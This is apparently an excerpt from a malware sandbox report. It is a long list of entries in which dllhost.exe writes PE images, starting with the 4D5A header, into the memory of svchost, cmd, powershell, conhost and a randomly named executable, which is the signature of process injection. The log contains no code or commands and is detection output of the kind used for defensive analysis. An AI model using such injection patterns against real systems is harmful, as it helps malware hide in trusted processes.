Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 1217AF90000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 1A680850000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\conhost.exe base: 192A3140000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\SysWOW64\wbem\WmiPrvSE.exe base: 3C70000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\dllhost.exe base: 294E53C0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\RuntimeBroker.exe base: 2B83DFA0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\RuntimeBroker.exe base: 1661BCE0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\iHPNvmnLELxfyVUCfJQyNbSnVMCwhlAlueSlMTCbPvwTvfHpABuhYFQGVnnNUhNJPZWua\nPUCJvROIvVxBMv.exe base: 5F0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\iHPNvmnLELxfyVUCfJQyNbSnVMCwhlAlueSlMTCbPvwTvfHpABuhYFQGVnnNUhNJPZWua\nPUCJvROIvVxBMv.exe base: 600000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\iHPNvmnLELxfyVUCfJQyNbSnVMCwhlAlueSlMTCbPvwTvfHpABuhYFQGVnnNUhNJPZWua\nPUCJvROIvVxBMv.exe base: 760000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\iHPNvmnLELxfyVUCfJQyNbSnVMCwhlAlueSlMTCbPvwTvfHpABuhYFQGVnnNUhNJPZWua\nPUCJvROIvVxBMv.exe base: 900000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\iHPNvmnLELxfyVUCfJQyNbSnVMCwhlAlueSlMTCbPvwTvfHpABuhYFQGVnnNUhNJPZWua\nPUCJvROIvVxBMv.exe base: 1050000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\iHPNvmnLELxfyVUCfJQyNbSnVMCwhlAlueSlMTCbPvwTvfHpABuhYFQGVnnNUhNJPZWua\nPUCJvROIvVxBMv.exe base: 530000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\iHPNvmnLELxfyVUCfJQyNbSnVMCwhlAlueSlMTCbPvwTvfHpABuhYFQGVnnNUhNJPZWua\nPUCJvROIvVxBMv.exe base: 1030000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\iHPNvmnLELxfyVUCfJQyNbSnVMCwhlAlueSlMTCbPvwTvfHpABuhYFQGVnnNUhNJPZWua\nPUCJvROIvVxBMv.exe base: 6A0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\iHPNvmnLELxfyVUCfJQyNbSnVMCwhlAlueSlMTCbPvwTvfHpABuhYFQGVnnNUhNJPZWua\nPUCJvROIvVxBMv.exe base: CC0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\iHPNvmnLELxfyVUCfJQyNbSnVMCwhlAlueSlMTCbPvwTvfHpABuhYFQGVnnNUhNJPZWua\nPUCJvROIvVxBMv.exe base: 1130000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\iHPNvmnLELxfyVUCfJQyNbSnVMCwhlAlueSlMTCbPvwTvfHpABuhYFQGVnnNUhNJPZWua\nPUCJvROIvVxBMv.exe base: 1080000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\iHPNvmnLELxfyVUCfJQyNbSnVMCwhlAlueSlMTCbPvwTvfHpABuhYFQGVnnNUhNJPZWua\nPUCJvROIvVxBMv.exe base: DA0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\iHPNvmnLELxfyVUCfJQyNbSnVMCwhlAlueSlMTCbPvwTvfHpABuhYFQGVnnNUhNJPZWua\nPUCJvROIvVxBMv.exe base: E70000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\iHPNvmnLELxfyVUCfJQyNbSnVMCwhlAlueSlMTCbPvwTvfHpABuhYFQGVnnNUhNJPZWua\nPUCJvROIvVxBMv.exe base: E10000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\iHPNvmnLELxfyVUCfJQyNbSnVMCwhlAlueSlMTCbPvwTvfHpABuhYFQGVnnNUhNJPZWua\nPUCJvROIvVxBMv.exe base: CA0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\iHPNvmnLELxfyVUCfJQyNbSnVMCwhlAlueSlMTCbPvwTvfHpABuhYFQGVnnNUhNJPZWua\nPUCJvROIvVxBMv.exe base: 760000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\iHPNvmnLELxfyVUCfJQyNbSnVMCwhlAlueSlMTCbPvwTvfHpABuhYFQGVnnNUhNJPZWua\nPUCJvROIvVxBMv.exe base: 14A0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\iHPNvmnLELxfyVUCfJQyNbSnVMCwhlAlueSlMTCbPvwTvfHpABuhYFQGVnnNUhNJPZWua\nPUCJvROIvVxBMv.exe base: 11B0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\iHPNvmnLELxfyVUCfJQyNbSnVMCwhlAlueSlMTCbPvwTvfHpABuhYFQGVnnNUhNJPZWua\nPUCJvROIvVxBMv.exe base: 13C0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\iHPNvmnLELxfyVUCfJQyNbSnVMCwhlAlueSlMTCbPvwTvfHpABuhYFQGVnnNUhNJPZWua\nPUCJvROIvVxBMv.exe base: 1220000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\iHPNvmnLELxfyVUCfJQyNbSnVMCwhlAlueSlMTCbPvwTvfHpABuhYFQGVnnNUhNJPZWua\nPUCJvROIvVxBMv.exe base: DB0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\iHPNvmnLELxfyVUCfJQyNbSnVMCwhlAlueSlMTCbPvwTvfHpABuhYFQGVnnNUhNJPZWua\nPUCJvROIvVxBMv.exe base: 700000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\iHPNvmnLELxfyVUCfJQyNbSnVMCwhlAlueSlMTCbPvwTvfHpABuhYFQGVnnNUhNJPZWua\nPUCJvROIvVxBMv.exe base: 500000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\iHPNvmnLELxfyVUCfJQyNbSnVMCwhlAlueSlMTCbPvwTvfHpABuhYFQGVnnNUhNJPZWua\nPUCJvROIvVxBMv.exe base: AC0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\iHPNvmnLELxfyVUCfJQyNbSnVMCwhlAlueSlMTCbPvwTvfHpABuhYFQGVnnNUhNJPZWua\nPUCJvROIvVxBMv.exe base: 9D0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\iHPNvmnLELxfyVUCfJQyNbSnVMCwhlAlueSlMTCbPvwTvfHpABuhYFQGVnnNUhNJPZWua\nPUCJvROIvVxBMv.exe base: 7A0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\iHPNvmnLELxfyVUCfJQyNbSnVMCwhlAlueSlMTCbPvwTvfHpABuhYFQGVnnNUhNJPZWua\nPUCJvROIvVxBMv.exe base: 3A0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\iHPNvmnLELxfyVUCfJQyNbSnVMCwhlAlueSlMTCbPvwTvfHpABuhYFQGVnnNUhNJPZWua\nPUCJvROIvVxBMv.exe base: B30000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\iHPNvmnLELxfyVUCfJQyNbSnVMCwhlAlueSlMTCbPvwTvfHpABuhYFQGVnnNUhNJPZWua\nPUCJvROIvVxBMv.exe base: E10000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\iHPNvmnLELxfyVUCfJQyNbSnVMCwhlAlueSlMTCbPvwTvfHpABuhYFQGVnnNUhNJPZWua\nPUCJvROIvVxBMv.exe base: FF0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\iHPNvmnLELxfyVUCfJQyNbSnVMCwhlAlueSlMTCbPvwTvfHpABuhYFQGVnnNUhNJPZWua\nPUCJvROIvVxBMv.exe base: 1500000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\iHPNvmnLELxfyVUCfJQyNbSnVMCwhlAlueSlMTCbPvwTvfHpABuhYFQGVnnNUhNJPZWua\nPUCJvROIvVxBMv.exe base: 1300000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\iHPNvmnLELxfyVUCfJQyNbSnVMCwhlAlueSlMTCbPvwTvfHpABuhYFQGVnnNUhNJPZWua\nPUCJvROIvVxBMv.exe base: B80000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\iHPNvmnLELxfyVUCfJQyNbSnVMCwhlAlueSlMTCbPvwTvfHpABuhYFQGVnnNUhNJPZWua\nPUCJvROIvVxBMv.exe base: 1210000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\iHPNvmnLELxfyVUCfJQyNbSnVMCwhlAlueSlMTCbPvwTvfHpABuhYFQGVnnNUhNJPZWua\nPUCJvROIvVxBMv.exe base: 9E0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\iHPNvmnLELxfyVUCfJQyNbSnVMCwhlAlueSlMTCbPvwTvfHpABuhYFQGVnnNUhNJPZWua\nPUCJvROIvVxBMv.exe base: 900000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\iHPNvmnLELxfyVUCfJQyNbSnVMCwhlAlueSlMTCbPvwTvfHpABuhYFQGVnnNUhNJPZWua\nPUCJvROIvVxBMv.exe base: 9C0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\iHPNvmnLELxfyVUCfJQyNbSnVMCwhlAlueSlMTCbPvwTvfHpABuhYFQGVnnNUhNJPZWua\nPUCJvROIvVxBMv.exe base: AA0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\iHPNvmnLELxfyVUCfJQyNbSnVMCwhlAlueSlMTCbPvwTvfHpABuhYFQGVnnNUhNJPZWua\nPUCJvROIvVxBMv.exe base: 690000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\iHPNvmnLELxfyVUCfJQyNbSnVMCwhlAlueSlMTCbPvwTvfHpABuhYFQGVnnNUhNJPZWua\nPUCJvROIvVxBMv.exe base: 1130000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\iHPNvmnLELxfyVUCfJQyNbSnVMCwhlAlueSlMTCbPvwTvfHpABuhYFQGVnnNUhNJPZWua\nPUCJvROIvVxBMv.exe base: 1110000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\iHPNvmnLELxfyVUCfJQyNbSnVMCwhlAlueSlMTCbPvwTvfHpABuhYFQGVnnNUhNJPZWua\nPUCJvROIvVxBMv.exe base: BF0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\iHPNvmnLELxfyVUCfJQyNbSnVMCwhlAlueSlMTCbPvwTvfHpABuhYFQGVnnNUhNJPZWua\nPUCJvROIvVxBMv.exe base: 7D0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\iHPNvmnLELxfyVUCfJQyNbSnVMCwhlAlueSlMTCbPvwTvfHpABuhYFQGVnnNUhNJPZWua\nPUCJvROIvVxBMv.exe base: CC0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\iHPNvmnLELxfyVUCfJQyNbSnVMCwhlAlueSlMTCbPvwTvfHpABuhYFQGVnnNUhNJPZWua\nPUCJvROIvVxBMv.exe base: 9A0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\iHPNvmnLELxfyVUCfJQyNbSnVMCwhlAlueSlMTCbPvwTvfHpABuhYFQGVnnNUhNJPZWua\nPUCJvROIvVxBMv.exe base: 5B0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\iHPNvmnLELxfyVUCfJQyNbSnVMCwhlAlueSlMTCbPvwTvfHpABuhYFQGVnnNUhNJPZWua\nPUCJvROIvVxBMv.exe base: B10000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\iHPNvmnLELxfyVUCfJQyNbSnVMCwhlAlueSlMTCbPvwTvfHpABuhYFQGVnnNUhNJPZWua\nPUCJvROIvVxBMv.exe base: 1350000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\iHPNvmnLELxfyVUCfJQyNbSnVMCwhlAlueSlMTCbPvwTvfHpABuhYFQGVnnNUhNJPZWua\nPUCJvROIvVxBMv.exe base: F50000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\iHPNvmnLELxfyVUCfJQyNbSnVMCwhlAlueSlMTCbPvwTvfHpABuhYFQGVnnNUhNJPZWua\nPUCJvROIvVxBMv.exe base: B70000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\iHPNvmnLELxfyVUCfJQyNbSnVMCwhlAlueSlMTCbPvwTvfHpABuhYFQGVnnNUhNJPZWua\nPUCJvROIvVxBMv.exe base: 7B0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\iHPNvmnLELxfyVUCfJQyNbSnVMCwhlAlueSlMTCbPvwTvfHpABuhYFQGVnnNUhNJPZWua\nPUCJvROIvVxBMv.exe base: F90000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\iHPNvmnLELxfyVUCfJQyNbSnVMCwhlAlueSlMTCbPvwTvfHpABuhYFQGVnnNUhNJPZWua\nPUCJvROIvVxBMv.exe base: 1140000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\iHPNvmnLELxfyVUCfJQyNbSnVMCwhlAlueSlMTCbPvwTvfHpABuhYFQGVnnNUhNJPZWua\nPUCJvROIvVxBMv.exe base: 620000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\iHPNvmnLELxfyVUCfJQyNbSnVMCwhlAlueSlMTCbPvwTvfHpABuhYFQGVnnNUhNJPZWua\nPUCJvROIvVxBMv.exe base: DE0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\iHPNvmnLELxfyVUCfJQyNbSnVMCwhlAlueSlMTCbPvwTvfHpABuhYFQGVnnNUhNJPZWua\nPUCJvROIvVxBMv.exe base: 1210000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\iHPNvmnLELxfyVUCfJQyNbSnVMCwhlAlueSlMTCbPvwTvfHpABuhYFQGVnnNUhNJPZWua\nPUCJvROIvVxBMv.exe base: C60000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\iHPNvmnLELxfyVUCfJQyNbSnVMCwhlAlueSlMTCbPvwTvfHpABuhYFQGVnnNUhNJPZWua\nPUCJvROIvVxBMv.exe base: 7C0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\iHPNvmnLELxfyVUCfJQyNbSnVMCwhlAlueSlMTCbPvwTvfHpABuhYFQGVnnNUhNJPZWua\nPUCJvROIvVxBMv.exe base: A50000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\iHPNvmnLELxfyVUCfJQyNbSnVMCwhlAlueSlMTCbPvwTvfHpABuhYFQGVnnNUhNJPZWua\nPUCJvROIvVxBMv.exe base: 190000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\iHPNvmnLELxfyVUCfJQyNbSnVMCwhlAlueSlMTCbPvwTvfHpABuhYFQGVnnNUhNJPZWua\nPUCJvROIvVxBMv.exe base: 600000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\iHPNvmnLELxfyVUCfJQyNbSnVMCwhlAlueSlMTCbPvwTvfHpABuhYFQGVnnNUhNJPZWua\nPUCJvROIvVxBMv.exe base: 1130000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\iHPNvmnLELxfyVUCfJQyNbSnVMCwhlAlueSlMTCbPvwTvfHpABuhYFQGVnnNUhNJPZWua\nPUCJvROIvVxBMv.exe base: 150000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\iHPNvmnLELxfyVUCfJQyNbSnVMCwhlAlueSlMTCbPvwTvfHpABuhYFQGVnnNUhNJPZWua\nPUCJvROIvVxBMv.exe base: FD0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\iHPNvmnLELxfyVUCfJQyNbSnVMCwhlAlueSlMTCbPvwTvfHpABuhYFQGVnnNUhNJPZWua\nPUCJvROIvVxBMv.exe base: 5D0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\iHPNvmnLELxfyVUCfJQyNbSnVMCwhlAlueSlMTCbPvwTvfHpABuhYFQGVnnNUhNJPZWua\nPUCJvROIvVxBMv.exe base: 830000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\iHPNvmnLELxfyVUCfJQyNbSnVMCwhlAlueSlMTCbPvwTvfHpABuhYFQGVnnNUhNJPZWua\nPUCJvROIvVxBMv.exe base: D20000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\iHPNvmnLELxfyVUCfJQyNbSnVMCwhlAlueSlMTCbPvwTvfHpABuhYFQGVnnNUhNJPZWua\nPUCJvROIvVxBMv.exe base: 900000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\iHPNvmnLELxfyVUCfJQyNbSnVMCwhlAlueSlMTCbPvwTvfHpABuhYFQGVnnNUhNJPZWua\nPUCJvROIvVxBMv.exe base: 1250000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\iHPNvmnLELxfyVUCfJQyNbSnVMCwhlAlueSlMTCbPvwTvfHpABuhYFQGVnnNUhNJPZWua\nPUCJvROIvVxBMv.exe base: 3A0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\iHPNvmnLELxfyVUCfJQyNbSnVMCwhlAlueSlMTCbPvwTvfHpABuhYFQGVnnNUhNJPZWua\nPUCJvROIvVxBMv.exe base: 11F0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\iHPNvmnLELxfyVUCfJQyNbSnVMCwhlAlueSlMTCbPvwTvfHpABuhYFQGVnnNUhNJPZWua\nPUCJvROIvVxBMv.exe base: 9F0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\iHPNvmnLELxfyVUCfJQyNbSnVMCwhlAlueSlMTCbPvwTvfHpABuhYFQGVnnNUhNJPZWua\nPUCJvROIvVxBMv.exe base: F40000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\iHPNvmnLELxfyVUCfJQyNbSnVMCwhlAlueSlMTCbPvwTvfHpABuhYFQGVnnNUhNJPZWua\nPUCJvROIvVxBMv.exe base: 170000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\iHPNvmnLELxfyVUCfJQyNbSnVMCwhlAlueSlMTCbPvwTvfHpABuhYFQGVnnNUhNJPZWua\nPUCJvROIvVxBMv.exe base: 940000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\iHPNvmnLELxfyVUCfJQyNbSnVMCwhlAlueSlMTCbPvwTvfHpABuhYFQGVnnNUhNJPZWua\nPUCJvROIvVxBMv.exe base: 1B0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\iHPNvmnLELxfyVUCfJQyNbSnVMCwhlAlueSlMTCbPvwTvfHpABuhYFQGVnnNUhNJPZWua\nPUCJvROIvVxBMv.exe base: 620000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\iHPNvmnLELxfyVUCfJQyNbSnVMCwhlAlueSlMTCbPvwTvfHpABuhYFQGVnnNUhNJPZWua\nPUCJvROIvVxBMv.exe base: 11F0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\iHPNvmnLELxfyVUCfJQyNbSnVMCwhlAlueSlMTCbPvwTvfHpABuhYFQGVnnNUhNJPZWua\nPUCJvROIvVxBMv.exe base: 690000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\iHPNvmnLELxfyVUCfJQyNbSnVMCwhlAlueSlMTCbPvwTvfHpABuhYFQGVnnNUhNJPZWua\nPUCJvROIvVxBMv.exe base: A20000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\iHPNvmnLELxfyVUCfJQyNbSnVMCwhlAlueSlMTCbPvwTvfHpABuhYFQGVnnNUhNJPZWua\nPUCJvROIvVxBMv.exe base: C70000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\iHPNvmnLELxfyVUCfJQyNbSnVMCwhlAlueSlMTCbPvwTvfHpABuhYFQGVnnNUhNJPZWua\nPUCJvROIvVxBMv.exe base: D30000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\iHPNvmnLELxfyVUCfJQyNbSnVMCwhlAlueSlMTCbPvwTvfHpABuhYFQGVnnNUhNJPZWua\nPUCJvROIvVxBMv.exe base: EE0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\iHPNvmnLELxfyVUCfJQyNbSnVMCwhlAlueSlMTCbPvwTvfHpABuhYFQGVnnNUhNJPZWua\nPUCJvROIvVxBMv.exe base: 3C0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\iHPNvmnLELxfyVUCfJQyNbSnVMCwhlAlueSlMTCbPvwTvfHpABuhYFQGVnnNUhNJPZWua\nPUCJvROIvVxBMv.exe base: B10000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\iHPNvmnLELxfyVUCfJQyNbSnVMCwhlAlueSlMTCbPvwTvfHpABuhYFQGVnnNUhNJPZWua\nPUCJvROIvVxBMv.exe base: C60000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\iHPNvmnLELxfyVUCfJQyNbSnVMCwhlAlueSlMTCbPvwTvfHpABuhYFQGVnnNUhNJPZWua\nPUCJvROIvVxBMv.exe base: 6E0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\iHPNvmnLELxfyVUCfJQyNbSnVMCwhlAlueSlMTCbPvwTvfHpABuhYFQGVnnNUhNJPZWua\nPUCJvROIvVxBMv.exe base: 1060000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\iHPNvmnLELxfyVUCfJQyNbSnVMCwhlAlueSlMTCbPvwTvfHpABuhYFQGVnnNUhNJPZWua\nPUCJvROIvVxBMv.exe base: 7A0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\iHPNvmnLELxfyVUCfJQyNbSnVMCwhlAlueSlMTCbPvwTvfHpABuhYFQGVnnNUhNJPZWua\nPUCJvROIvVxBMv.exe base: 1130000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\iHPNvmnLELxfyVUCfJQyNbSnVMCwhlAlueSlMTCbPvwTvfHpABuhYFQGVnnNUhNJPZWua\nPUCJvROIvVxBMv.exe base: E60000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\iHPNvmnLELxfyVUCfJQyNbSnVMCwhlAlueSlMTCbPvwTvfHpABuhYFQGVnnNUhNJPZWua\nPUCJvROIvVxBMv.exe base: C70000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\iHPNvmnLELxfyVUCfJQyNbSnVMCwhlAlueSlMTCbPvwTvfHpABuhYFQGVnnNUhNJPZWua\nPUCJvROIvVxBMv.exe base: 180000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\iHPNvmnLELxfyVUCfJQyNbSnVMCwhlAlueSlMTCbPvwTvfHpABuhYFQGVnnNUhNJPZWua\nPUCJvROIvVxBMv.exe base: A00000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\cmd.exe base: 208442D0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\conhost.exe base: 20E8B1C0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe base: 27B67E10000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 175F9950000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 1DB9D660000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\cmd.exe base: 1CC91450000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\conhost.exe base: 261C3DC0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\cmd.exe base: 2220C4F0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\conhost.exe base: 2220AB60000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe base: 1B4EB270000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe base: 25872B90000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe base: 34B0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\conhost.exe base: 24D9FF40000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe base: 2D0D4F70000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\conhost.exe base: 123B8520000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 26A87990000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 17953770000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 2295D530000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 253067D0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 1845B390000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 1ADEBFD0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 1D559040000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 241A9E70000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 1CD73160000 value starts with: 4D5A
